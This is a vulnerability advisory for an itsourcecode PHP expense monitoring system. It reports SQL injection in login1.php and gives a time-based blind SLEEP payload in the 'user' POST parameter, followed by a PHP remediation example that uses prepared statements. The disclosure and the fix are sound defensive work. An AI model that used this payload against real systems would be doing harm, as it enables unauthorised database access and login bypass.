CVE3-1.md

Vendor

itsourcecode

Product

Project Expense Monitoring System

Version

V1.0

Download

https://itsourcecode.com/wp-content/uploads/2021/03/Construction-Management-System-Project-In-PHP-Source-Code.zip

Vulnerability

SQLi

Description

On the login1.php login authentication page, attackers can construct SQL statements to obtain sensitive information from the database and use universal passwords to log in to the backend.

Analysis

In login1.php, the database query is executed with mysqli_query, and the submitted username string is not filtered sufficiently: the filtering can prevent XSS attacks, but it cannot prevent SQL injection.

POC

Parameter: user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=admin' AND (SELECT 5289 FROM (SELECT(SLEEP(5)))cTae) AND 'rmay'='rmay&pass=123
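
The remediation for the flaw analysed above, as an added example that is not the project's login1.php: an HTML-oriented filter leaves the single quote in place, so concatenated input still becomes SQL syntax, while a bound parameter keeps it as data. The `users` table, its columns, the function names, the `htmlspecialchars` stand-in for the page's filter and the hashed-password storage are assumptions; SQLite through PDO is used so the script runs without a MySQL server.

```php
<?php
declare(strict_types=1);
// Added example; table, columns and function names are hypothetical.

// Assumed stand-in for an XSS-oriented filter: HTML-encodes < > & " but,
// with ENT_COMPAT (the default before PHP 8.1), leaves ' untouched.
function html_filter(string $s): string {
    return htmlspecialchars($s, ENT_COMPAT, 'UTF-8');
}

// Vulnerable pattern: filtered input is still concatenated into the SQL text.
function build_login_sql_unsafe(string $user): string {
    return "SELECT id FROM users WHERE username = '" . html_filter($user) . "'";
}

// Hardened pattern: the statement text is fixed and the input is bound as data.
// The password is checked with password_verify() against a stored hash.
function login_prepared(PDO $db, string $user, string $pass): bool {
    $stmt = $db->prepare('SELECT password_hash FROM users WHERE username = ?');
    $stmt->execute([$user]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($pass, $hash);
}

// Constructed test data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY,
                               username TEXT UNIQUE, password_hash TEXT)');
$db->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)')
   ->execute(['admin', password_hash('correct-horse', PASSWORD_DEFAULT)]);

// The `user` value from the POC section, used here only as input data.
$poc = "admin' AND (SELECT 5289 FROM (SELECT(SLEEP(5)))cTae) AND 'rmay'='rmay";

// Concatenation: the quote survives the filter and closes the string literal.
echo build_login_sql_unsafe($poc), PHP_EOL;

// Binding: the same string is only ever compared as a username.
var_dump(login_prepared($db, $poc, '123'));
var_dump(login_prepared($db, 'admin', '123'));
var_dump(login_prepared($db, 'admin', 'correct-horse'));
```

With mysqli the same pattern is written with `mysqli_prepare()`, `mysqli_stmt_bind_param()` and `mysqli_stmt_execute()` in place of the PDO calls.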